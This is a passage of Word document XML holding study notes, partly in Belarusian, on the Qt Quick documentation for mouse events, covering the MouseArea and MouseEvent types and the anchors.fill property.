        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
        <w:rPr>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Гэты модуль я пакуль прапушчу.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00CF3A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CF3A01" w:rsidRPr="009210E8" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2202" w:history="1">
        <w:r w:rsidR="009210E8" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qtquick</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>input</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>mouseevents</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="009210E8" w:rsidRPr="000B77C6">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="00B82406" w:rsidRDefault="009210E8" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1846" w:name="_Toc483000930"/>
      <w:bookmarkStart w:id="1847" w:name="_Toc483003921"/>
      <w:bookmarkStart w:id="1848" w:name="_Toc483604273"/>
      <w:bookmarkStart w:id="1849" w:name="_Toc483605493"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mouse Events</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1846"/>
      <w:bookmarkEnd w:id="1847"/>
      <w:bookmarkEnd w:id="1848"/>
      <w:bookmarkEnd w:id="1849"/>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1850" w:name="mouse-types"/>
      <w:bookmarkStart w:id="1851" w:name="_Toc483000931"/>
      <w:bookmarkStart w:id="1852" w:name="_Toc483003922"/>
      <w:bookmarkStart w:id="1853" w:name="_Toc483604274"/>
      <w:bookmarkStart w:id="1854" w:name="_Toc483605494"/>
      <w:bookmarkEnd w:id="1850"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mouse Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1851"/>
      <w:bookmarkEnd w:id="1852"/>
      <w:bookmarkEnd w:id="1853"/>
      <w:bookmarkEnd w:id="1854"/>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2203" w:history="1">
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2204" w:history="1">
        <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>MouseEvent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="009210E8" w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>object</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1855" w:name="mouse-event-handling"/>
      <w:bookmarkStart w:id="1856" w:name="_Toc483000932"/>
      <w:bookmarkStart w:id="1857" w:name="_Toc483003923"/>
      <w:bookmarkStart w:id="1858" w:name="_Toc483604275"/>
      <w:bookmarkStart w:id="1859" w:name="_Toc483605495"/>
      <w:bookmarkEnd w:id="1855"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mouse Event Handling</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1856"/>
      <w:bookmarkEnd w:id="1857"/>
      <w:bookmarkEnd w:id="1858"/>
      <w:bookmarkEnd w:id="1859"/>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML uses</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2205" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>signals and handlers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to deliver mouse interactions. Specifically, Qt Quick provides the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2206" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2207" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseEvent</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">types which </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allow developers to define signal handlers which accept mouse events within a defined area</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="00B82406">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1860" w:name="defining-a-mouse-area"/>
      <w:bookmarkStart w:id="1861" w:name="_Toc483000933"/>
      <w:bookmarkStart w:id="1862" w:name="_Toc483003924"/>
      <w:bookmarkStart w:id="1863" w:name="_Toc483604276"/>
      <w:bookmarkStart w:id="1864" w:name="_Toc483605496"/>
      <w:bookmarkEnd w:id="1860"/>
      <w:r w:rsidRPr="00B82406">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Defining a Mouse Area</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1861"/>
      <w:bookmarkEnd w:id="1862"/>
      <w:bookmarkEnd w:id="1863"/>
      <w:bookmarkEnd w:id="1864"/>
    </w:p>
    <w:p w:rsidR="009210E8" w:rsidRPr="009210E8" w:rsidRDefault="009210E8" w:rsidP="009210E8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2208" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>MouseArea</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">type receives events within a defined area. One quick way to define this area is </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to anchor the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MouseArea</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to its parent's area using the</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchors.fill</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property. If the parent is a</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2209" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(or any</w:t>
      </w:r>
      <w:r w:rsidRPr="009210E8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2210" w:history="1">
        <w:r w:rsidRPr="009210E8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="009210E8">
